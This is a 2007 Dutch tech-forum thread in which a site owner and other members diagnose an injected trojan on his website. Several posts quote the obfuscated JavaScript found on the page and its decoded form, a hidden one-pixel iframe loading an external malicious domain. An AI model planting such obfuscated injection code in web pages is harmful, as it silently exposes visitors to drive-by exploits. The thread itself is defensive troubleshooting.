Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien
Toon posts:

Virus op website?

Pagina: 1
Acties:
  • 1.393 views sinds 30-01-2008
  • Reageer

donderdag 23 augustus 2007 15:10

Acties:
  • Ye Greate'96
  • Registratie: Juli 2001
  • Laatst online: 11-08-2021

Ye Greate'96

Topicstarter
Ik krijg klachten dat op onze website een trojan horse zou zitten, nou heb ik zelf nergens last van, ook niet op andere computers.
Maar aangezien meerdere mensen ons hierop wezen ben ik maar eens gaan onderzoeken wat het probleem is.

Het enige vreemde dat ik tegenkom is dat op sommige pc's er een activex component uitgevoerd wil worden wanneer je naar onze site gaat.
De ene keer is het een Windows Media Player Extention, dan is het weer iets van Quicktime.

Krijgt iemand problemen bij deze site? Of weet iemand wat het probleem is?
Ik kan me niet voorstellen dat het gevaarlijk is. Wij draaien overal up-to-date Symantec anti-virus clients.


het gaat om http://www.ja.nl

donderdag 23 augustus 2007 15:15

Acties:
  • Lord_Nemesis
  • Registratie: Juni 2002
  • Laatst online: 19:46

Lord_Nemesis

Wa oars?

AntiVir geeft hier bij mij de melding dat er een ADODB.Exploit.Gen wordt gedetecteerd.

Virus: HTML/ADODB.Exploit.Gen
Date discovered: 18/07/2007
Type: Exploit
In the wild: Yes
Reported Infections: Low
Distribution Potential: Low
Damage Potential: Low
Static file: No

Hoop dat je hier iets mee kunt.

/edit: Even snel gegoogled: http://www.trendmicro.com...5.asp?VName=VBS_PSYME.ABZ

[ Voor 14% gewijzigd door Lord_Nemesis op 23-08-2007 15:20 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery

donderdag 23 augustus 2007 15:16

Acties:

Verwijderd

Ik vraag me wel eens af wat de oorsprong van de naam is: tröj is Nedersaksies en betekent in Nederlands trui.

[ Voor 201% gewijzigd door Verwijderd op 19-04-2016 10:06 ]

donderdag 23 augustus 2007 15:16

Acties:
  • digital8
  • Registratie: Februari 2000
  • Laatst online: 26-09 16:19

digital8

Na het bezoeken van die site krijg ik het volgende..,

Afbeeldingslocatie: http://img120.imageshack.us/img120/5637/trojanpk4.jpg

Ik zou zeggen zoek daar eens naar....

donderdag 23 augustus 2007 15:16

Acties:

Verwijderd

Krijg zelf de invoegtoepassing:
Microsoft Data Access - Remote Data Services....

Geen virusmelding hiero...Norman btw

[ Voor 4% gewijzigd door Verwijderd op 23-08-2007 15:16 ]

donderdag 23 augustus 2007 15:17

Acties:
  • StevenK
  • Registratie: Februari 2001
  • Nu online

StevenK

php of apache exploit? Heb laatst ook zoiets gehad.

Kijk maar eens goed naar de processen die op het ding draaien, daar zitten ongetwijfeld processen tussen die je daar niet wil hebben.

[ Voor 126% gewijzigd door StevenK op 23-08-2007 15:18 ]

Was advocaat maar vindt het juridische nog steeds leuk

donderdag 23 augustus 2007 15:19

Acties:
  • Ye Greate'96
  • Registratie: Juli 2001
  • Laatst online: 11-08-2021

Ye Greate'96

Topicstarter
Is toch duidelijk een probleem

Maar ik vraag me toch sterk af of het probleem niet bij de webserver van Vuurwerk ligt ? Het is een extern gehoste site

Ik haal nu maar even de hele site op en probeer de boel te scannen met AVG!

[ Voor 7% gewijzigd door Ye Greate'96 op 23-08-2007 15:19 ]

donderdag 23 augustus 2007 15:21

Acties:
  • StevenK
  • Registratie: Februari 2001
  • Nu online

StevenK

Ye Greate'96 schreef op donderdag 23 augustus 2007 @ 15:19:
Is toch duidelijk een probleem

Maar ik vraag me toch sterk af of het probleem niet bij de webserver van Vuurwerk ligt ? Het is een extern gehoste site
99% kans dat het een probleem van Vuurwerk is.

Was advocaat maar vindt het juridische nog steeds leuk

donderdag 23 augustus 2007 15:21

Acties:
  • PierreG
  • Registratie: Oktober 2006
  • Laatst online: 27-11 10:20

PierreG

Ik heb niets speciaal gevonden. Browse in opera en draai geupdate AVG professional. Maar zal idd waarschijnlijk een php of apache exploit zijn. Is je versie van apache geupdate?

donderdag 23 augustus 2007 15:21

Acties:
  • borstel
  • Registratie: Juli 2004
  • Laatst online: 24-11 21:17

borstel

Lord_Nemesis schreef op donderdag 23 augustus 2007 @ 15:15:
AntiVir geeft hier bij mij de melding dat er een ADODB.Exploit.Gen wordt gedetecteerd.

Virus: HTML/ADODB.Exploit.Gen
Date discovered: 18/07/2007
Type: Exploit
In the wild: Yes
Reported Infections: Low
Distribution Potential: Low
Damage Potential: Low
Static file: No

Hoop dat je hier iets mee kunt.

/edit: Even snel gegoogled: http://www.trendmicro.com...5.asp?VName=VBS_PSYME.ABZ
Ik krijg de zelfde melding met IE7. Wanneer ik met Firefox naar ja.nl surf, krijg ik geen melding.

donderdag 23 augustus 2007 15:23

Acties:
  • crisp
  • Registratie: Februari 2000
  • Laatst online: 00:51

crisp

Devver

Pixelated

Dat stukje javascript injecteert uiteindelijk het volgende in je pagina:
HTML:
1

<div style="visibility:hidden"><iframe src="http://yektcnt.info/ld/guc/" width=1 height=1></iframe></div>

Die URL geeft uiteindelijk enkel een errorpage.

Intentionally left blank

donderdag 23 augustus 2007 15:23

Acties:
  • Ye Greate'96
  • Registratie: Juli 2001
  • Laatst online: 11-08-2021

Ye Greate'96

Topicstarter
Verwijderd schreef op donderdag 23 augustus 2007 @ 15:16:
JavaScript:
1

<script language="JavaScript">e = '0x00' + '6E';str1 = "%D5%8D%86%9B%F1%9C%9D%96%85%8A%D2%CF%9B%86%9C%86%8F%86%85%86%9D%96%D7%89%86%8D%8D%8A%83%CF%D3%D5%86%8B%9F%8E%82%8A%F1%9C%9F%8C%D2%CF%89%9D%9D%81%D7%C0%C0%96%8A%84%9D%8C%83%9D%C3%86%83%8B%80%C0%85%8D%C0%88%9A%8C%C0%CF%F1%98%86%8D%9D%89%D2%DE%F1%89%8A%86%88%89%9D%D2%DE%D3%D5%C0%86%8B%9F%8E%82%8A%D3%D5%C0%8D%86%9B%D3";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>


Geen idee wat het is maar het zit wel onder aan je pagina...
Ik heb ook geen flauw idee wat dat is, heb het zojuist verwijderd, misschien dat dat iets oplost
het vervelende is dat ik zelf nergens een virus waarschuwing te voorschijn krijg

donderdag 23 augustus 2007 15:24

Acties:
  • Nielsvr
  • Registratie: Maart 2004
  • Laatst online: 18-11 13:04

Nielsvr

Verwijderd schreef op donderdag 23 augustus 2007 @ 15:16:
JavaScript:
1

<script language="JavaScript">e = '0x00' + '6E';str1 = "%D5%8D%86%9B%F1%9C%9D%96%85%8A%D2%CF%9B%86%9C%86%8F%86%85%86%9D%96%D7%89%86%8D%8D%8A%83%CF%D3%D5%86%8B%9F%8E%82%8A%F1%9C%9F%8C%D2%CF%89%9D%9D%81%D7%C0%C0%96%8A%84%9D%8C%83%9D%C3%86%83%8B%80%C0%85%8D%C0%88%9A%8C%C0%CF%F1%98%86%8D%9D%89%D2%DE%F1%89%8A%86%88%89%9D%D2%DE%D3%D5%C0%86%8B%9F%8E%82%8A%D3%D5%C0%8D%86%9B%D3";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>


Geen idee wat het is maar het zit wel onder aan je pagina...
Dat is hem, de output als je het unescaped alert:

code:
1

<div style="visibility:hidden"><iframe src="http://yektcnt.info/ld/guc/" width=1 height=1></iframe></div>

donderdag 23 augustus 2007 15:25

Acties:
  • borstel
  • Registratie: Juli 2004
  • Laatst online: 24-11 21:17

borstel

Lijkt nu opgelost te zijn. Op ja.nl geen melding meer. Wel als ik naar 'http://yektcnt.info/ld/guc/' surf.

donderdag 23 augustus 2007 15:30

Acties:
  • Ye Greate'96
  • Registratie: Juli 2001
  • Laatst online: 11-08-2021

Ye Greate'96

Topicstarter
Inderdaad, dat zal het wel zijn geweest, toch heel raar!

donderdag 23 augustus 2007 15:34

Acties:
  • Nielsvr
  • Registratie: Maart 2004
  • Laatst online: 18-11 13:04

Nielsvr

Ye Greate'96 schreef op donderdag 23 augustus 2007 @ 15:30:
Inderdaad, dat zal het wel zijn geweest, toch heel raar!
Ik zou het wel melden bij je webhosting partij, en zelf je code na (laten) gaan. Want als iemand deze code kan plaatsen, en er wordt niet aan gedaan, dan kan hij of zij dat nu nog steeds!

donderdag 23 augustus 2007 16:40

Acties:
  • TeeDee
  • Registratie: Februari 2001
  • Laatst online: 19:45

TeeDee

CQB 241

Als extra aanvulling: [PHP] phpfake hack?

Heart..pumps blood.Has nothing to do with emotion! Bored

Pagina: 1
Reageer

Apple iPhone 17 LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq